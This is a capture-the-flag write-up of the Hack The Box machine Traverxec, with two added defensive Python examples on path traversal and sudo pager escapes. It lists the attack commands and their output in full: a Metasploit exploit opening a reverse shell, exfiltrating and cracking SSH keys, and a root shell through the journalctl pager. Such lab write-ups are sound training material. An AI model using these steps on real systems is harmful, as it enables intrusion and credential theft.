Hack The Box Writeup: Traverxec

On November 16, 2019, Hack The Box launched the Linux machine Traverxec. It is rated “Easy”, and that rating holds up after rooting it.


[0x1] Reconnaissance & Enumeration

As usual, the box starts with an Nmap scan of all TCP ports, with the default scripts and service/version detection enabled.

nmap -sC -sV -p- -oA traverxec 10.10.10.165

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-06 20:03 GMT
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.05% done; ETC: 20:10 (0:04:36 remaining)
Stats: 0:04:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.21% done; ETC: 20:11 (0:02:57 remaining)
Nmap scan report for 10.10.10.165
Host is up (0.020s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 393.13 seconds

The scan shows two open ports: 22 (OpenSSH 7.9p1) and 80, where Nostromo 1.9.6 is running. A quick check with searchsploit shows that a directory traversal remote command execution exploit for Nostromo is public and available as a Metasploit module.

searchsploit nostromo

 Exploit Title                                                        |  Path
--------------------------------------------------------------------- ----------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)  | exploits/multiple/remote/47573.rb

[0x2] Initial foothold

Let’s fire up the good old msfconsole.

msfconsole
[msfconsole ASCII banner omitted]
       =[ metasploit v5.0.72-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

The Nostromo module was not yet in my installation, so Metasploit had to be updated first. On Kali this is done with apt install metasploit-framework; if the package is already installed, apt upgrades it to the current version.

msf5 exploit(multi/http/nostromo_code_exec) > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

Only two options are needed to run the exploit: RHOSTS with the IP address of the Traverxec box and LHOST with your own VPN (tun0) IP address.

msf5 > use exploit/multi/http/nostromo_code_exec 

msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165

msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.15.47
LHOST => 10.10.15.47

The exploit takes a few seconds to run and then you get a limited shell as www-data, the unprivileged account Nostromo runs under.

msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.47:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.47:4444 -> 10.10.10.165:55468) at 2020-02-08 09:35:06 +0000

whoami
www-data

From the command shell session you can upgrade to an interactive TTY with Metasploit’s shell command. It looks for python on the target and uses the pty module to spawn a proper terminal, the same trick as the well-known python -c 'import pty; pty.spawn("/bin/bash")' one-liner.

shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell

[0x3] Path to User flag

After poking around the machine and reading Nostromo’s documentation, I found the configuration file, /var/nostromo/conf/nhttpd.conf. The homedirs and homedirs_public settings at the bottom are the interesting part: they make /home/<user>/public_www reachable over HTTP as /~<user>/, so David’s public_www directory is the place to look. The htaccess and htpasswd lines mean that any directory containing a .htaccess file is protected with HTTP basic authentication, with the password hashes in /var/nostromo/conf/.htpasswd. Note that /home/david itself cannot be listed (the directory is searchable but not readable for www-data), so you have to cd straight to the full path of public_www rather than descending one directory at a time.

cat /var/nostromo/conf/nhttpd.conf

# MAIN [MANDATORY]
servername	traverxec.htb
serverlisten	*
serveradmin	david@traverxec.htb
serverroot	/var/nostromo
servermimes	conf/mimes
docroot	/var/nostromo/htdocs
docindex	index.html
# LOGS [OPTIONAL]
logpid	logs/nhttpd.pid
# SETUID [RECOMMENDED]
user	www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess	.htaccess
htpasswd	/var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons	/var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs	/home
homedirs_public	public_www
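
The following is an added example, not code from the writeup or from Nostromo: it parses the nhttpd.conf shown above, lists the local directories the server exposes and where it keeps its credentials, and resolves request paths to files. The mapping rules (docroot, aliases such as /icons, and ~user home directories via homedirs/homedirs_public) follow the nhttpd.conf semantics; the placeholder <user> stands for any account under /home. resolve_url_naive is a generic illustration of the directory traversal bug class (normalising before decoding and never checking containment) and is not Nostromo’s own code.

```python
"""Parse nhttpd.conf and resolve request paths safely (added example)."""
import posixpath
from urllib.parse import unquote

# Copied from the writeup's /var/nostromo/conf/nhttpd.conf (comments kept
# to show the parser skips them).
NHTTPD_CONF = """\
# MAIN [MANDATORY]
servername      traverxec.htb
serverlisten    *
serveradmin     david@traverxec.htb
serverroot      /var/nostromo
servermimes     conf/mimes
docroot         /var/nostromo/htdocs
docindex        index.html
logpid          logs/nhttpd.pid
user            www-data
htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd
/icons          /var/nostromo/icons
homedirs        /home
homedirs_public public_www
"""


def parse_nhttpd_conf(text):
    """Return (options, aliases). Keys beginning with '/' are URL aliases."""
    options, aliases = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts
        if key.startswith("/"):
            aliases[key.rstrip("/") or "/"] = value
        else:
            options[key] = value
    return options, aliases


def server_file(options, path):
    """Relative paths such as 'conf/mimes' are taken relative to serverroot."""
    return path if path.startswith("/") else posixpath.join(options["serverroot"], path)


def exposed_roots(options, aliases):
    """URL prefix -> local directory the server will read files from."""
    roots = {"/": options["docroot"]}
    roots.update(aliases)
    if "homedirs" in options:
        roots["/~<user>"] = posixpath.join(
            options["homedirs"], "<user>", options.get("homedirs_public", ""))
    return roots


def _mapped_base(options, aliases, path):
    """Pick the directory a normalised request path is served from."""
    if path.startswith("/~") and "homedirs" in options:
        user, _, rest = path[2:].partition("/")
        if user in ("", ".", ".."):
            return None, None
        return posixpath.join(options["homedirs"], user,
                              options.get("homedirs_public", "")), rest
    for prefix, target in sorted(aliases.items(), key=lambda kv: len(kv[0]), reverse=True):
        if path == prefix or path.startswith(prefix + "/"):
            return target, path[len(prefix):].lstrip("/")
    return options["docroot"], path.lstrip("/")


def resolve_url(options, aliases, url):
    """Hardened order: percent-decode first, normalise the absolute URL path
    (which cannot climb above '/'), map it, then still verify containment."""
    path = posixpath.normpath("/" + unquote(url).lstrip("/"))
    base, rest = _mapped_base(options, aliases, path)
    if base is None:
        return None
    base = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base, rest)) if rest else base
    return full if full == base or full.startswith(base + "/") else None


def resolve_url_naive(options, aliases, url):
    """Bug-class illustration: normalises the still-encoded URL, decodes
    afterwards, and never checks that the result stays inside the mapped
    directory, so %2e%2e components walk out of the docroot."""
    path = unquote(posixpath.normpath("/" + url.lstrip("/")))
    base, rest = _mapped_base(options, aliases, path)
    if base is None:
        return None
    return posixpath.normpath(posixpath.join(base, rest)) if rest else base


if __name__ == "__main__":
    opts, al = parse_nhttpd_conf(NHTTPD_CONF)
    for prefix, directory in exposed_roots(opts, al).items():
        print(f"{prefix:10} -> {directory}")
    print("htpasswd:", server_file(opts, opts["htpasswd"]))
```

Running it lists three exposed roots (the docroot, /icons, and every user’s public_www) and the credential file; the two resolvers differ only in the order of decode/normalise and the final containment check, which is exactly the difference between a traversal bug and a safe file server.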

While watching a YouTube video about Hack The Box, I came across a simple way to copy a file from a remote shell to your own machine without any file transfer channel: base64-encode the file, copy the text out of the terminal and decode it locally. Here I do that with the gzipped tarball of David’s SSH keys. It is worth comparing an md5sum or sha256sum of the file on both sides afterwards, because a copy/paste that drops a single character silently corrupts the archive.

base64 backup-ssh-identity-files.tgz
I paste the base64 data into the file backup_base64.txt and then decode the contents into a new file, backup.tgz.

base64 -d backup_base64.txt |sudo tee backup.tgz

The archive can now be extracted in the usual way, and David’s private and public key appear along with his authorized_keys file.

tar -zxf backup.tgz
ls
authorized_keys id_rsa id_rsa.pub

I prepare the captured private key for cracking with John the Ripper using ssh2john, a Python script that ships with John in /usr/share/john on Kali.

python /usr/share/john/ssh2john.py id_rsa > id_rsa_ready4john.txt

With the key converted into John’s format, I start a dictionary attack with the rockyou wordlist.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_ready4john.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2020-02-08 10:57) 0.1779g/s 2551Kp/s 2551Kc/s 2551KC/sa6_123..*7¡Vamos!
Session completed

John has no trouble with it: within seconds the passphrase is found, hunter it is! Note that John itself warns that the SSH format can emit false positives, which is why it keeps trying after a candidate; --show confirms that there is a single result.

john id_rsa_ready4john.txt --show
id_rsa:hunter

With the private key I connect via SSH (port 22 was open in the Nmap scan) and enter the passphrase. A prompt as david appears.

ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': 

Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Sat Feb 8 05:59:17 2020 from 10.10.15.230
david@traverxec:~$ 

A quick look in the home directory shows user.txt.

ls
bin public_www user.txt

cat user.txt
7db0b48469606a42cec20750d9782f3d

So much for the user flag. Now for the other half of the challenge: on to root!

[0x4] Path to Root flag

Once in David’s home directory it is time to look around for new clues. The bin folder contains an interesting script that collects some server statistics and prints them, including the last lines of the Nostromo journal, which it fetches via sudo.

cat server-stats.sh

#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

journalctl is a GTFOBin, a Linux binary whose legitimate features can be abused for privilege escalation when it runs with elevated rights. Whenever I see a script running a command under sudo, consulting gtfobins.github.io is one of my first actions.

When journalctl is started in a terminal, it hands the latest journal entries to a pager (less), and less lets you run shell commands with !. Because the pager is a child of the journalctl process that sudo started as root, that shell is root too. Two details matter here. First, the script pipes journalctl into cat, which suppresses the pager, so you must run the sudo command yourself in a terminal rather than through the script. Second, less quits immediately when the output fits on one screen (journalctl sets LESS to FRSXMK by default), so the terminal window must be small enough that the five log lines plus header do not fit, otherwise you never get the pager prompt. The proper fix is not to grant sudo on journalctl at all: adding david to the systemd-journal group lets him read the nostromo unit’s logs without root.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sat 2020-02-08 06:14
Feb 08 06:28:03 traverxec su[1297]: F
Feb 08 06:29:06 traverxec sudo[1370]:
Feb 08 06:29:20 traverxec sudo[1381]:
Feb 08 06:56:33 traverxec su[2396]: p
Feb 08 06:56:35 traverxec su[2396]: F

The command runs and shows its output inside the pager; now it is possible to escalate and get a shell as root with !/bin/sh.

!/bin/sh

# whoami
root
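
As an added example (not code from the writeup), here is a small audit that scans a shell script for programs run under sudo that hand their output to a pager, the pattern that gave root here. PAGER_BINARIES is a hand-picked subset of what GTFOBins documents, not an exhaustive list, and the parsing is deliberately simple (one pipeline per line, split on |); the sample script is the server-stats.sh shown above.

```python
"""Find sudo-run pager binaries in a shell script (added example)."""
import os
import shlex
from dataclasses import dataclass, field

# Programs that run $PAGER (less by default) when stdout is a terminal; less
# executes "!cmd" with the pager's privileges, so under sudo that is root.
# Hand-picked subset of GTFOBins, not exhaustive.
PAGER_BINARIES = {"journalctl", "systemctl", "git", "man", "less", "more"}

# Flags that stop the program from starting a pager at all.
NO_PAGER_FLAGS = {"journalctl": {"--no-pager"},
                  "systemctl": {"--no-pager"},
                  "git": {"--no-pager"}}

# The server-stats.sh from the writeup, used as sample input.
SERVER_STATS = """\
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
"""


@dataclass
class Finding:
    line_no: int
    binary: str                 # basename of the program run under sudo
    argv: list = field(default_factory=list)
    piped: bool = False         # output goes into a pipe inside the script
    escapable: bool = False     # a pager escape is possible via the sudo rule


def _command_after_sudo(tokens):
    """Return (binary, argv) for the program sudo runs, or None."""
    for i, tok in enumerate(tokens):
        if os.path.basename(tok) != "sudo":
            continue
        j = i + 1
        while j < len(tokens) and tokens[j].startswith("-"):
            j += 2 if tokens[j] in ("-u", "-g") else 1   # skip sudo's own options
        if j < len(tokens):
            return os.path.basename(tokens[j]), tokens[j + 1:]
        return None
    return None


def pager_escape_possible(binary, argv):
    """True when the program spawns a pager and nothing in argv disables it."""
    if binary not in PAGER_BINARIES:
        return False
    return not (NO_PAGER_FLAGS.get(binary, set()) & set(argv))


def audit_script(script):
    """Scan a shell script for sudo-run pager programs.

    Each line is treated as one pipeline and split on '|'. Segments with
    unbalanced quotes (a '|' inside backticks, as in the ss/find lines of
    server-stats.sh) make shlex raise ValueError and are skipped."""
    findings = []
    for n, line in enumerate(script.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        segments = stripped.split("|")
        for k, seg in enumerate(segments):
            try:
                tokens = shlex.split(seg, comments=True)
            except ValueError:
                continue
            found = _command_after_sudo(tokens)
            if found is None:
                continue
            binary, argv = found
            findings.append(Finding(n, binary, argv, k < len(segments) - 1,
                                    pager_escape_possible(binary, argv)))
    return findings


def explain(finding):
    """One-line verdict. A pipe into cat only hides the pager inside the
    script; the sudo rule itself still lets the user run the command in a
    terminal, so the finding stays escapable."""
    if not finding.escapable:
        return f"line {finding.line_no}: sudo {finding.binary}: no pager escape known"
    hint = " ('| cat' in the script does not help)" if finding.piped else ""
    return (f"line {finding.line_no}: sudo {finding.binary} can spawn a pager; "
            f"'!/bin/sh' inside it gives a root shell{hint}")


if __name__ == "__main__":
    for f in audit_script(SERVER_STATS):
        print(explain(f))
```

On the sample script this reports exactly one finding, the journalctl line, flagged as escapable even though it is piped into cat. The same check applied to sudoers entries (rather than scripts) is more useful in practice, since that is where the privilege is actually granted.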

As root, I look for root.txt in the usual place to see whether the flag is there or another challenge awaits.

cd /root 
# ls
nostromo_1.9.6-1.deb root.txt

# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906

Root flag it is! Nice box and relatively easy for beginners. Learned another nice privilege escalation and on to the next machine!
